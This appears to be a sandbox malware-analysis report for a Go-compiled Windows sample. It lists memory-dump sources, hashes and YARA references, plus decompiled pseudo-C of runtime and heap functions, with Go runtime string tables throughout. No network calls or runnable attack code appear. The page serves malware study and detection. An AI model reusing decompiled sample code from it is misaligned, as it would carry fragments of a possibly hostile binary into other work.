AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGu$preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCount=, levelBits[level]$recovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompar
                                                                                                                            • API String ID: 0-2872188254
                                                                                                                            • Opcode ID: 3a0e5aff59c4d4bd72211dd135349bd888fd2b70c46297c803f8eb9969a1b83e
                                                                                                                            • Instruction ID: 0813dc6d5fae0d2207f9385fa81a25c6619847c39c0a3e6bf32782444d2a43ac
                                                                                                                            • Opcode Fuzzy Hash: 3a0e5aff59c4d4bd72211dd135349bd888fd2b70c46297c803f8eb9969a1b83e
                                                                                                                            • Instruction Fuzzy Hash: 08027F72209B85C6EB28EB19E44039E77B5F7D8B98F545122EB8D07B69DF38C085CB44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AB460C Relevance: 11.6, APIs: 9, Instructions: 305COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$malloc$_errno$_callnewh$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2779598320-0
                                                                                                                            • Opcode ID: e1bff219e582551bd37b6f9105059a019e0bde4c95d5ac3916c1589dc38db4cc
                                                                                                                            • Instruction ID: 2a977c051f3a2638a0267be82752ef58aa703a0fea0dd7c675b9a0a2f8dbc15b
                                                                                                                            • Opcode Fuzzy Hash: e1bff219e582551bd37b6f9105059a019e0bde4c95d5ac3916c1589dc38db4cc
                                                                                                                            • Instruction Fuzzy Hash: 5491EE32319F4C4BDB5A9A5C5C597B973D1EB85311F64025EF48AC36A3DF30DC02469A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A63A0C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 74%
                                                                                                                            			E0000025B25BF8A63A0C(intOrPtr __edx, void* __edi, void* __eflags, long long __rcx, long long __r8) {
				void* __rbx;
				unsigned int _t48;
				void* _t54;
				intOrPtr _t70;
				void* _t78;
				void* _t91;
				void* _t92;
				void* _t94;
				intOrPtr _t96;
				void* _t97;
				char _t111;
				intOrPtr _t113;
				void* _t117;
				signed long long _t119;
				intOrPtr* _t124;
				void* _t125;
				void* _t131;
				void* _t158;
				void* _t161;
				signed int* _t162;
				void* _t164;
				void* _t166;
				void* _t167;
				void* _t181;
				int _t183;
				int _t185;
				signed int* _t186;
				int _t188;
				signed long long _t189;

				_t91 = __edi;
				_t117 = _t166;
				 *((intOrPtr*)(_t117 + 0x20)) = r9d;
				 *((long long*)(_t117 + 0x18)) = __r8;
				 *((intOrPtr*)(_t117 + 0x10)) = __edx;
				 *((long long*)(_t117 + 8)) = __rcx;
				_t167 = _t166 - 0x48;
				if (E0000025B25BF8A6351C(__edi) != 0) goto 0xf8a63cc5;
				if (E0000025B25BF8A6388C( *(_t167 + 0xc0)) != 0) goto 0xf8a63cc5;
				_t119 =  *(_t167 + 0xc8) << 7;
				r12d =  *((intOrPtr*)(_t119 + 0x25bf8aa511c));
				_t48 =  *(_t167 + 0xb0);
				_t78 = _t181 + _t181;
				bpl = (_t48 & 0x00000007) != 0;
				_t96 = 0 + (_t48 >> 3);
				if (_t78 - _t164 - 2 >= 0) goto 0xf8a63cc0;
				r13d = 0;
				r13d = r13d - _t78;
				if (__edx - _t183 - 2 > 0) goto 0xf8a63cc0;
				malloc(_t188);
				_t162 = _t119;
				malloc(_t185);
				_t189 = _t119;
				_t54 = malloc(_t183);
				_t186 = _t119;
				if (_t162 == 0) goto 0xf8a63c9f;
				if (_t189 == 0) goto 0xf8a63c97;
				if (_t119 == 0) goto 0xf8a63c97;
				 *((intOrPtr*)(_t167 + 0x30)) = 0;
				if ( *((intOrPtr*)(_t167 + 0xa0)) == 0) goto 0xf8a63b0c;
				r8d =  *((intOrPtr*)(_t167 + 0xa8));
				 *((long long*)(_t167 + 0x20)) = _t167 + 0x30;
				goto 0xf8a63b1c;
				r8d = 0;
				 *((long long*)(_t167 + 0x20)) = _t167 + 0x30;
				0xf8a60cbc();
				if (_t54 != 0) goto 0xf8a63c7b;
				_t70 =  *((intOrPtr*)(_t167 + 0x98));
				_t131 = _t162 + _t181;
				r13d = r13d - _t70;
				r13d = r13d - 2;
				r8d = r13d;
				E0000025B25BF8A793C0(__edi, 0, __edi, _t97, _t131, _t162, __r8);
				 *((char*)(_t131 + _t162)) = 1;
				r8d = _t70;
				E0000025B25BF8A797B0(_t181 + _t183 + 1, __edi, _t94, _t97, _t131 + _t162,  *((intOrPtr*)(_t167 + 0x90)), __r8);
				if ( *((intOrPtr*)(0x25bf8a5f400 + 0x46d38 + ( *(_t167 + 0xc0) +  *(_t167 + 0xc0) * 4 +  *(_t167 + 0xc0) +  *(_t167 + 0xc0) * 4) * 8))() == r12d) goto 0xf8a63ba1;
				goto 0xf8a63c7b;
				r13d = _t96;
				r8d = r12d;
				r13d = r13d - r12d;
				r13d = r13d - 1;
				 *((intOrPtr*)(_t167 + 0x20)) = r13d;
				if (E0000025B25BF8A648F0(__edi,  *((intOrPtr*)(0x25bf8a5f400 + 0x46d38 + ( *(_t167 + 0xc0) +  *(_t167 + 0xc0) * 4 +  *(_t167 + 0xc0) +  *(_t167 + 0xc0) * 4) * 8))() - r12d, 0x25bf8a5f400, _t125, _t186, _t189, _t181, _t158) != 0) goto 0xf8a63c7b;
				_t111 = r13d;
				if (_t111 == 0) goto 0xf8a63be7;
				r8d = r13d;
				 *_t162 =  *_t162 ^  *(_t189 - _t162 + _t162);
				if (_t111 != 0) goto 0xf8a63bda;
				r8d = r13d;
				 *((intOrPtr*)(_t167 + 0x20)) = r12d;
				if (E0000025B25BF8A648F0(_t91, _t111, 0x25bf8a5f400, _t125, _t162, _t189, _t161, _t164) != 0) goto 0xf8a63c7b;
				_t113 = r12d;
				if (_t113 == 0) goto 0xf8a63c23;
				 *_t186 =  *_t186 ^  *(_t189 - _t186 + _t186);
				if (_t113 != 0) goto 0xf8a63c16;
				_t124 =  *((intOrPtr*)(_t167 + 0xd8));
				if ( *_t124 - _t96 >= 0) goto 0xf8a63c38;
				 *_t124 = _t96;
				goto 0xf8a63c7b;
				 *((char*)( *((intOrPtr*)(_t167 + 0xd0)))) = 0;
				E0000025B25BF8A797B0(_t91, _t91, _t94, _t97,  *((intOrPtr*)(_t167 + 0xd0)) + 1, _t186, _t181);
				_t92 = _t181 + 1;
				r8d = r13d;
				E0000025B25BF8A797B0(_t92, _t92, _t94, _t97,  *((intOrPtr*)(_t167 + 0xd0)) + 1 +  *((intOrPtr*)(_t167 + 0xd0)), _t162, _t181);
				 *((intOrPtr*)( *((intOrPtr*)(_t167 + 0xd8)))) = _t164 - 1 + _t92 - r12d;
				free(_t125);
				free(??);
				free(??);
				goto 0xf8a63cc5;
				free(??);
				if (_t189 == 0) goto 0xf8a63cac;
				free(??);
				if (_t186 == 0) goto 0xf8a63cb9;
				free(??);
				goto 0xf8a63cc5;
				return 0x16;
			}
































                                                                                                                            0x25bf8a63a0c
                                                                                                                            0x25bf8a63a0c
                                                                                                                            0x25bf8a63a0f
                                                                                                                            0x25bf8a63a13
                                                                                                                            0x25bf8a63a17
                                                                                                                            0x25bf8a63a1a
                                                                                                                            0x25bf8a63a2a
                                                                                                                            0x25bf8a63a3f
                                                                                                                            0x25bf8a63a53
                                                                                                                            0x25bf8a63a68
                                                                                                                            0x25bf8a63a6c
                                                                                                                            0x25bf8a63a74
                                                                                                                            0x25bf8a63a7d
                                                                                                                            0x25bf8a63a81
                                                                                                                            0x25bf8a63a88
                                                                                                                            0x25bf8a63a8f
                                                                                                                            0x25bf8a63a95
                                                                                                                            0x25bf8a63a98
                                                                                                                            0x25bf8a63aa1
                                                                                                                            0x25bf8a63aa9
                                                                                                                            0x25bf8a63ab0
                                                                                                                            0x25bf8a63ab3
                                                                                                                            0x25bf8a63abb
                                                                                                                            0x25bf8a63abe
                                                                                                                            0x25bf8a63ac3
                                                                                                                            0x25bf8a63ac9
                                                                                                                            0x25bf8a63ad2
                                                                                                                            0x25bf8a63adb
                                                                                                                            0x25bf8a63ae9
                                                                                                                            0x25bf8a63af3
                                                                                                                            0x25bf8a63af5
                                                                                                                            0x25bf8a63b05
                                                                                                                            0x25bf8a63b0a
                                                                                                                            0x25bf8a63b11
                                                                                                                            0x25bf8a63b17
                                                                                                                            0x25bf8a63b1e
                                                                                                                            0x25bf8a63b27
                                                                                                                            0x25bf8a63b2d
                                                                                                                            0x25bf8a63b34
                                                                                                                            0x25bf8a63b3a
                                                                                                                            0x25bf8a63b3d
                                                                                                                            0x25bf8a63b41
                                                                                                                            0x25bf8a63b44
                                                                                                                            0x25bf8a63b55
                                                                                                                            0x25bf8a63b5b
                                                                                                                            0x25bf8a63b61
                                                                                                                            0x25bf8a63b95
                                                                                                                            0x25bf8a63b9c
                                                                                                                            0x25bf8a63ba1
                                                                                                                            0x25bf8a63ba7
                                                                                                                            0x25bf8a63baa
                                                                                                                            0x25bf8a63bb2
                                                                                                                            0x25bf8a63bb5
                                                                                                                            0x25bf8a63bc3
                                                                                                                            0x25bf8a63bc9
                                                                                                                            0x25bf8a63bcc
                                                                                                                            0x25bf8a63bd4
                                                                                                                            0x25bf8a63bdd
                                                                                                                            0x25bf8a63be5
                                                                                                                            0x25bf8a63bea
                                                                                                                            0x25bf8a63bf2
                                                                                                                            0x25bf8a63c00
                                                                                                                            0x25bf8a63c05
                                                                                                                            0x25bf8a63c08
                                                                                                                            0x25bf8a63c19
                                                                                                                            0x25bf8a63c21
                                                                                                                            0x25bf8a63c23
                                                                                                                            0x25bf8a63c2d
                                                                                                                            0x25bf8a63c2f
                                                                                                                            0x25bf8a63c36
                                                                                                                            0x25bf8a63c4a
                                                                                                                            0x25bf8a63c4d
                                                                                                                            0x25bf8a63c52
                                                                                                                            0x25bf8a63c57
                                                                                                                            0x25bf8a63c62
                                                                                                                            0x25bf8a63c79
                                                                                                                            0x25bf8a63c7e
                                                                                                                            0x25bf8a63c86
                                                                                                                            0x25bf8a63c8e
                                                                                                                            0x25bf8a63c95
                                                                                                                            0x25bf8a63c9a
                                                                                                                            0x25bf8a63ca2
                                                                                                                            0x25bf8a63ca7
                                                                                                                            0x25bf8a63caf
                                                                                                                            0x25bf8a63cb4
                                                                                                                            0x25bf8a63cbe
                                                                                                                            0x25bf8a63cd5

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$malloc$_errno$_callnewh
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4160633307-0
                                                                                                                            • Opcode ID: 145c9b70824bfad6206279638bd8523be3541a49aee38d355e7a59ef029164fd
                                                                                                                            • Instruction ID: 28c6ab8bfcaa0bb357e4f6b147104aba7bc7581ab24aab673f4fe163eb71db08
                                                                                                                            • Opcode Fuzzy Hash: 145c9b70824bfad6206279638bd8523be3541a49aee38d355e7a59ef029164fd
                                                                                                                            • Instruction Fuzzy Hash: 8071E323304F8546EF229B269C487AF77A1F785BD9F245015BE4647F8ADB38C40AC728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01307EA0 Relevance: 11.4, Strings: 9, Instructions: 167COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 33%
                                                                                                                            			E01307EA0() {
				char _v0;
				char _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				signed long long _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				long long _v136;
				long long _v144;
				char _v152;
				long long _v160;
				long long _v168;
				char _v200;
				char _v232;
				long long _v240;
				signed long long _v248;
				long long _v256;
				long long _v272;
				char _v280;
				signed long long _v288;
				long long _v312;
				void* _t66;
				void* _t76;
				void* _t86;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				long long _t110;
				char* _t112;
				signed long long _t113;
				long long _t117;
				long long _t118;
				signed long long _t120;
				char* _t127;
				long long _t132;
				intOrPtr _t134;
				long long _t137;
				long long _t149;
				signed long long _t152;
				char _t158;
				void* _t160;
				long long* _t161;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t167;
				void* _t168;
				intOrPtr _t170;
				void* _t172;

				L0:
				while(1) {
					if( &_v168 <=  *((intOrPtr*)(_t168 + 0x10))) {
						L21:
						E01356200(_t131, _t158);
						continue;
					}
					_t161 = _t160 - 0x128;
					_v8 = _t158;
					_t158 =  &_v8;
					_t110 = _v0;
					E01347BE0(_t66, _t110, _t120, _t158);
					E01348360(_t110, _t120, _t158, _t168);
					_v168 = _t110;
					_v248 = _t120;
					 *_t161 = _t110;
					_v288 = _t120;
					_v280 = 0x28;
					E01302320(_t86, 0x31, _t92, _t94, _t131);
					asm("inc ebp");
					_t170 =  *((intOrPtr*)( *[gs:0x28]));
					_t127 = _v272;
					if(_t127 < 0) {
						L20:
						E01345E00(_t86, _t95,  &_v200, 0x1389539, _t127, _v168, _v248, _t158, _t162, _t163, _t167, _t170);
						E01330BA0( &_v200, 0x1389539, _t158);
						goto L21;
					}
					_t112 = _t127 - 1;
					_t131 = _v248;
					if(_t131 < _t112) {
						L19:
						_t127 = _t112;
						L01358900();
						goto L20;
					}
					_t162 = _t127 + 2;
					if(_t131 > _t162) {
						L5:
						if(0 < 0) {
							L18:
							L01358900();
							goto L19;
						}
						if(_t162 < _t112) {
							L17:
							L01358980();
							goto L18;
						}
						_t134 = _v168;
						r9d =  *(_t127 + _t134 - 1) & 0x000000ff;
						r10d =  *(_t127 + _t134) & 0x000000ff;
						r10d = r10d << 8;
						r9d = r9d | r10d;
						if (r9w != 0x282e) goto L4;
						r9d =  *(_t127 + _t134 + 1) & 0x000000ff;
						if(r9b != 0x2a) {
							goto L4;
						}
						_v256 = _t112;
						_t131 = _t131 - _t127;
						_v240 = _t131;
						_t113 = _t131 - 2;
						_v248 = _t113;
						_t130 = _t113;
						_t117 = ( ~_t113 >> 0x0000003f & _t162) + _t134;
						_v160 = _t117;
						 *_t161 = _t117;
						_v288 = _t113;
						_v280 = 0x29;
						_t76 = E01302320(_t86, 0x31, _t92, _t94, _t131);
						asm("inc ebp");
						_t170 =  *((intOrPtr*)( *[gs:0x28]));
						_t118 = _v272;
						asm("o16 nop [eax+eax]");
						if(_t118 >= 0) {
							_t130 = _t118 + 2;
							_t131 = _v248;
							if(_t130 >= _v248) {
								E01345E00(_t86, _t95, _t118, 0x138e1bc, _t130, _v160, _t131, _t158, _t162, _t163, _t167, _t170);
								_t76 = E01330BA0(_t118, 0x138e1bc, _t158);
							}
							asm("o16 nop [eax+eax]");
							if(0 <= 0) {
								if(_t118 <= _t130) {
									_t137 = _v160;
									r8d =  *(_t137 + _t118) & 0x0000ffff;
									if (r8w != 0x2e29) goto L10;
									_t132 = _t137;
									asm("o16 nop [eax+eax]");
									_v312 = _t158;
									E01358B39(_t76,  &_v152 - 0x30);
									_t158 = _v0;
									_v152 = 0x138804e;
									_v144 = 0xd;
									_v136 = _v168;
									_v128 = _v256;
									_t149 = "./0:<=?CLMPSZ[\\";
									_v120 = _t149;
									_v112 = 1;
									_v104 = _t132;
									_v96 = _t118;
									_v88 = _t149;
									_v80 = 1;
									_t152 = _v240 - _t118 + 0xfffffffc;
									_t162 = _t152;
									_v72 = ( ~_t152 >> 0x0000003f & _t130) + _t132;
									_v64 = _t152;
									_v56 = 0x13890c5;
									_v48 = 0x13;
									_v40 = _t132;
									_v32 = _t118;
									_t131 = 0x1386f85;
									_v24 = 0x1386f85;
									_v16 = 8;
									E01309100(E01345B60(_t86, 9, _t92, _t95, _t118,  &_v152, _t130, _t130, 0x13890c5, _t158, _t152, _t163, _t167, _t170), _t118,  &_v152, _t158, _t170);
									E01330420(_t93, _t95, 0x137b620, _t118, _t158, _t164, _t165, _t167, _t170, _t172);
								}
								L01358980();
							}
							L01358900();
						}
						_t112 =  &_v232;
						E01345E00(_t86, _t95, _t112, 0x138954c, _t130, _v160, _v248, _t158, _t162, _t163, _t167, _t170);
						E01330BA0(_t112, 0x138954c, _t158);
						goto L17;
					}
					L4:
					E01345E00(_t86, _t95, _t112, 0x138e6e5, _t127, _v168, _t131, _t158, _t162, _t163, _t167, _t170);
					E01330BA0(_t112, 0x138e6e5, _t158);
					goto L5;
				}
			}































































                                                                                                                            0x00000000
                                                                                                                            0x01307ea0
                                                                                                                            0x01307eac
                                                                                                                            0x01308220
                                                                                                                            0x01308220
                                                                                                                            0x00000000
                                                                                                                            0x01308220
                                                                                                                            0x01307eb2
                                                                                                                            0x01307eb9
                                                                                                                            0x01307ec1
                                                                                                                            0x01307ec9
                                                                                                                            0x01307ed1
                                                                                                                            0x01307ed6
                                                                                                                            0x01307edb
                                                                                                                            0x01307ee3
                                                                                                                            0x01307ee8
                                                                                                                            0x01307eec
                                                                                                                            0x01307ef1
                                                                                                                            0x01307ef6
                                                                                                                            0x01307efb
                                                                                                                            0x01307f08
                                                                                                                            0x01307f0f
                                                                                                                            0x01307f17
                                                                                                                            0x013081f5
                                                                                                                            0x01308213
                                                                                                                            0x01308218
                                                                                                                            0x00000000
                                                                                                                            0x01308218
                                                                                                                            0x01307f1d
                                                                                                                            0x01307f21
                                                                                                                            0x01307f29
                                                                                                                            0x013081ed
                                                                                                                            0x013081ed
                                                                                                                            0x013081f0
                                                                                                                            0x00000000
                                                                                                                            0x013081f0
                                                                                                                            0x01307f2f
                                                                                                                            0x01307f36
                                                                                                                            0x01307f60
                                                                                                                            0x01307f60
                                                                                                                            0x013081e5
                                                                                                                            0x013081e8
                                                                                                                            0x00000000
                                                                                                                            0x013081e8
                                                                                                                            0x01307f69
                                                                                                                            0x013081d9
                                                                                                                            0x013081e0
                                                                                                                            0x00000000
                                                                                                                            0x013081e0
                                                                                                                            0x01307f6f
                                                                                                                            0x01307f77
                                                                                                                            0x01307f7d
                                                                                                                            0x01307f82
                                                                                                                            0x01307f86
                                                                                                                            0x01307f8f
                                                                                                                            0x01307f91
                                                                                                                            0x01307f9b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01307f9d
                                                                                                                            0x01307fa2
                                                                                                                            0x01307fa5
                                                                                                                            0x01307faa
                                                                                                                            0x01307fae
                                                                                                                            0x01307fb3
                                                                                                                            0x01307fc0
                                                                                                                            0x01307fc3
                                                                                                                            0x01307fcb
                                                                                                                            0x01307fcf
                                                                                                                            0x01307fd4
                                                                                                                            0x01307fd9
                                                                                                                            0x01307fde
                                                                                                                            0x01307feb
                                                                                                                            0x01307ff2
                                                                                                                            0x01307ff7
                                                                                                                            0x01308003
                                                                                                                            0x01308009
                                                                                                                            0x0130800d
                                                                                                                            0x01308015
                                                                                                                            0x01308030
                                                                                                                            0x01308035
                                                                                                                            0x01308035
                                                                                                                            0x0130803a
                                                                                                                            0x01308040
                                                                                                                            0x01308049
                                                                                                                            0x0130804f
                                                                                                                            0x01308057
                                                                                                                            0x01308066
                                                                                                                            0x01308068
                                                                                                                            0x01308077
                                                                                                                            0x01308080
                                                                                                                            0x0130808a
                                                                                                                            0x0130808f
                                                                                                                            0x0130809a
                                                                                                                            0x013080a2
                                                                                                                            0x013080b6
                                                                                                                            0x013080c3
                                                                                                                            0x013080cb
                                                                                                                            0x013080d2
                                                                                                                            0x013080da
                                                                                                                            0x013080e6
                                                                                                                            0x013080ee
                                                                                                                            0x013080f6
                                                                                                                            0x013080fe
                                                                                                                            0x01308112
                                                                                                                            0x01308116
                                                                                                                            0x01308126
                                                                                                                            0x0130812e
                                                                                                                            0x0130813d
                                                                                                                            0x01308145
                                                                                                                            0x01308151
                                                                                                                            0x01308159
                                                                                                                            0x01308161
                                                                                                                            0x01308168
                                                                                                                            0x01308170
                                                                                                                            0x01308193
                                                                                                                            0x013081a2
                                                                                                                            0x013081a2
                                                                                                                            0x013081a7
                                                                                                                            0x013081a7
                                                                                                                            0x013081ac
                                                                                                                            0x013081ac
                                                                                                                            0x013081b1
                                                                                                                            0x013081cf
                                                                                                                            0x013081d4
                                                                                                                            0x00000000
                                                                                                                            0x013081d4
                                                                                                                            0x01307f38
                                                                                                                            0x01307f51
                                                                                                                            0x01307f56
                                                                                                                            0x00000000
                                                                                                                            0x01307f56

                                                                                                                            Strings
                                                                                                                            • value method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker in, xrefs: 01308093
                                                                                                                            • ), xrefs: 01307FD4
                                                                                                                            • panicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not found markroot job, xrefs: 013081FA
                                                                                                                            • ./0:<=?CLMPSZ[\, xrefs: 013080CB
                                                                                                                            • pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_VietTifinaghUgariticWSAI, xrefs: 01308161
                                                                                                                            • panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not found markroot jobs done to unalloca, xrefs: 013081B6
                                                                                                                            • panicwrap: unexpected string after type name: released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base poin, xrefs: 01308019
                                                                                                                            • called using nil *, g->atomicstatus=, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextEgypt Standard TimeGC work not flushedGetCurrentProcessIdGetSystemDirectoryWGetTokenInfor, xrefs: 01308136
                                                                                                                            • panicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to exec, xrefs: 01307F3A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: called using nil *, g->atomicstatus=, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextEgypt Standard TimeGC work not flushedGetCurrentProcessIdGetSystemDirectoryWGetTokenInfor$ pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_VietTifinaghUgariticWSAI$)$./0:<=?CLMPSZ[\$panicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not found markroot job$panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not found markroot jobs done to unalloca$panicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to exec$panicwrap: unexpected string after type name: released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base poin$value method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker in
                                                                                                                            • API String ID: 0-2435188883
                                                                                                                            • Opcode ID: 6ea0041e9e955b330939b95d25653d6fe7ca283d4ea229d62a129ba5c03d7fc6
                                                                                                                            • Instruction ID: b4676afbbf0bedb07bc75b108b5e891964ce6993e078f9ffc83be2b49ccc2e09
                                                                                                                            • Opcode Fuzzy Hash: 6ea0041e9e955b330939b95d25653d6fe7ca283d4ea229d62a129ba5c03d7fc6
                                                                                                                            • Instruction Fuzzy Hash: 7181AB32619BC181C7659B15F8503DEB7A5F789B88F888666EACC53B98DF3CD145CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 013066C0 Relevance: 11.4, Strings: 9, Instructions: 167COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E013066C0(void* __edx, void* __fp0, long long __rax, long long __rbx, long long __rbp, void* __r14, long long _a8) {
				char _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				char _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				long long _v136;
				long long _v144;
				long long _v152;
				long long _v160;
				long long _v168;
				long long _v176;
				long long _v184;
				long long _v272;
				void* _t92;
				void* _t98;
				void* _t100;
				void* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t114;
				long long _t124;
				long long _t125;
				long long _t126;
				long long _t128;
				long long _t131;
				long long _t134;
				long long _t135;
				intOrPtr _t137;
				long long _t140;
				long long _t141;
				intOrPtr _t143;
				void* _t151;
				long long _t153;
				void* _t167;
				long long _t181;
				void* _t194;
				void* _t196;
				void* _t200;

				L0:
				while(1) {
					L0:
					_t201 = __r14;
					_t131 = __rbx;
					_t122 = __rax;
					_t109 = __edx;
					if( &_v128 >  *((intOrPtr*)(__r14 + 0x10))) {
						break;
					}
					L16:
					_a8 = __rax;
					E01356200(_t151, __rbp);
				}
				L1:
				_v8 = __rbp;
				_t181 =  &_v8;
				_a8 = __rax;
				_t140 =  *((intOrPtr*)(__rax));
				if(_t140 != 0) {
					_t124 = _t140;
					E013513C0(_t105, _t110, _t111, _t114, _t124, __rbx, _t167, _t181, _t194, __r14);
					_t141 = _t124;
					_t122 = _a8;
				} else {
					_t141 = 0x138737a;
				}
				_v176 = _t131;
				_v136 = _t141;
				_t125 =  *((intOrPtr*)(_t122 + 0x10));
